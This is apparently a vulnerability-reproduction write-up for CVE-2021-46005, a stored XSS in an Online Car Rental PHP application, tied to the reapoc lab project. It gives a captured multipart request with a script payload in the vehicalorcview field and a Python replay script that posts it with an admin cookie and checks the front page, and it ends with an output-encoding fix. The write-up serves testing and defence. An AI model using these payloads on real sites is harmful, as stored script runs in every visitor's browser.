P.S. The Reapoc project aims to provide the most complete collection of vulnerability verification environments and standardized PoCs; anyone interested is welcome to help build it.
https://github.com/cckuailong/reapoc
If you like it, please give it a star 0.0
All future vulnerability reproduction environments from this public account will be put in this project.
Vulnerable environment
https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget
Start it with
docker-compose
3. Fill in all the details on the "post a vehicle" page. On submit, intercept the request in Burp, change the value of the "vehicalorcview" parameter to "<script>alert("CAR")</script>" and forward it. Nothing on the server escapes this field, so the script tag is stored verbatim in the vehicle record.
Here is the request I captured (the listing omits the session Cookie header); replace the cookie with the one from your own logged-in admin session and the request can be replayed as-is.
POST /OnlineCarRental/admin/post-avehical.php HTTP/1.1
Host: test.com:9202
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
Content-Length: 2085
Origin: http://test.com:9202
Connection: close
Referer: http://test.com:9202/OnlineCarRental/admin/post-avehical.php
Upgrade-Insecure-Requests: 1

-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicletitle"

TestName
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="brandname"

2
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicalorcview"

<script>alert("CAR")</script>
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="priceperday"

200
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="fueltype"

Diesel
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="modelyear"

2008
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="seatingcapacity"

22
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img1"; filename="Untitled.png"
Content-Type: image/png

PNG
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream


-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="powerdoorlocks"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="antilockbrakingsys"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="driverairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="passengerairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="centrallocking"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="crashcensor"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="submit"


-----------------------------13786099262839578593645594965--
4. Open the public front page of the application (in this environment http://test.com:9202/OnlineCarRental/; the original PoC uses http://localhost/car-rental/). The stored vehicle is rendered there without encoding, so the payload executes and the XSS fires for every visitor, not only the admin who submitted it.
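The two steps above can be replayed without Burp. The script below is an added example and is not part of the reapoc project or the original advisory: it rebuilds the multipart request from the capture above (with a constructed boundary and a minimal PNG signature in place of the real image), posts it with an admin session cookie you supply, then fetches the front page and reports whether the stored value came back raw (vulnerable), HTML-escaped (fixed), or not at all. The front-page path /OnlineCarRental/ and the exact form field set are assumptions taken from this write-up; a patched build may use a different listing page.

```python
"""Replay of the CVE-2021-46005 stored-XSS PoC (added example, not project code)."""
import html
import re
import sys
import urllib.request

ADMIN_POST = "/OnlineCarRental/admin/post-avehical.php"
FRONT_PAGE = "/OnlineCarRental/"          # assumption: public listing where the vehicle is rendered
PAYLOAD = '<script>alert("CAR")</script>'
BOUNDARY = "----reapocPoCBoundary7f3a9c2d"  # constructed; any token not present in the body works

# Field set copied from the captured request; only vehicalorcview carries the payload.
TEXT_FIELDS = [
    ("vehicletitle", "TestName"), ("brandname", "2"), ("priceperday", "200"),
    ("fueltype", "Diesel"), ("modelyear", "2008"), ("seatingcapacity", "22"),
    ("powerdoorlocks", "1"), ("antilockbrakingsys", "1"), ("driverairbag", "1"),
    ("passengerairbag", "1"), ("centrallocking", "1"), ("crashcensor", "1"),
    ("submit", ""),
]
PNG_STUB = b"\x89PNG\r\n\x1a\n"  # constructed 8-byte PNG signature standing in for Untitled.png


def build_vehicle_form(payload: str = PAYLOAD, boundary: str = BOUNDARY) -> bytes:
    """Serialise the post-avehical.php form as multipart/form-data with the XSS payload."""
    parts = []
    for name, value in TEXT_FIELDS + [("vehicalorcview", payload)]:
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="img1"; filename="Untitled.png"\r\n'
        f"Content-Type: image/png\r\n\r\n".encode() + PNG_STUB + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts)


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Minimal multipart parser used to verify the body before sending it."""
    fields = {}
    for chunk in body.split(f"--{boundary}".encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            fields[match.group(1).decode()] = value[:-2]  # drop the trailing CRLF
    return fields


def payload_state(page: str, payload: str = PAYLOAD) -> str:
    """'raw' = script tag present verbatim (exploitable), 'escaped' = entity-encoded, 'absent' = not stored."""
    if payload in page:
        return "raw"
    if html.escape(payload, quote=True) in page or html.escape(payload, quote=False) in page:
        return "escaped"
    return "absent"


def submit_and_check(base_url: str, admin_cookie: str) -> str:
    """POST the poisoned vehicle as admin, then inspect the public front page."""
    body = build_vehicle_form()
    req = urllib.request.Request(base_url + ADMIN_POST, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={BOUNDARY}")
    req.add_header("Cookie", admin_cookie)   # e.g. "PHPSESSID=..." from a logged-in admin
    urllib.request.urlopen(req, timeout=10).read()
    page = urllib.request.urlopen(base_url + FRONT_PAGE, timeout=10).read().decode("utf-8", "replace")
    return payload_state(page)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: poc.py http://test.com:9202 'PHPSESSID=<admin session>'")
    print("stored value on front page:", submit_and_check(sys.argv[1], sys.argv[2]))
```

Run it against the reapoc container with the admin cookie from your browser; "raw" reproduces the advisory, while "escaped" is what you should see once the field is passed through htmlspecialchars on output (output encoding, not input filtering, is the fix for a stored XSS like this one).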